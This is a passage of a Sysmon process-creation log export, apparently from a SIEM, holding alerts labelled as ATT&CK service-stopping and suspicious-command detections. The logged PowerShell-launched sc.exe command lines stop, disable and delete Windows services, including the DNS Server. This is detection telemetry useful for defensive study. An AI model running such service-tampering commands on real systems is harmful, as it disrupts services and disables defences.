(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:37.869"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-001060ee3000}"",""processId"":""3592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.156",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.816 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-001077ed3000} +ProcessId: 5128 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SuperProServer Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SuperProServer Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.826120700Z"",""eventRecordID"":""3908"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.816\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-001077ed3000}\r\nProcessId: 5128\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SuperProServer Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.816"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-001077ed3000}"",""processId"":""5128"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SuperProServer Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.694",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.740 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-0010bbeb3000} +ProcessId: 4768 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.744180600Z"",""eventRecordID"":""3906"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.740\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-0010bbeb3000}\r\nProcessId: 4768\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.740"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-0010bbeb3000}"",""processId"":""4768"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.640",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.690 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-00100ee93000} +ProcessId: 2360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.693037200Z"",""eventRecordID"":""3903"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.690\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-00100ee93000}\r\nProcessId: 2360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.690"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-00100ee93000}"",""processId"":""2360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.609",8,"ATT&CK: Quick Execution of a Series of 
Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.655 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-001058e73000} +ProcessId: 5100 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.657741200Z"",""eventRecordID"":""3901"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.655\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-001058e73000}\r\nProcessId: 5100\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating 
System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.655"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-001058e73000}"",""processId"":""5100"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.592",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.627 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-001010e63000} +ProcessId: 7912 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.634011400Z"",""eventRecordID"":""3900"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.627\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-001010e63000}\r\nProcessId: 7912\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.627"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-001010e63000}"",""processId"":""7912"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.560",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.477 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-0010e5e23000} +ProcessId: 5272 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.481464800Z"",""eventRecordID"":""3897"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.477\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-0010e5e23000}\r\nProcessId: 5272\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
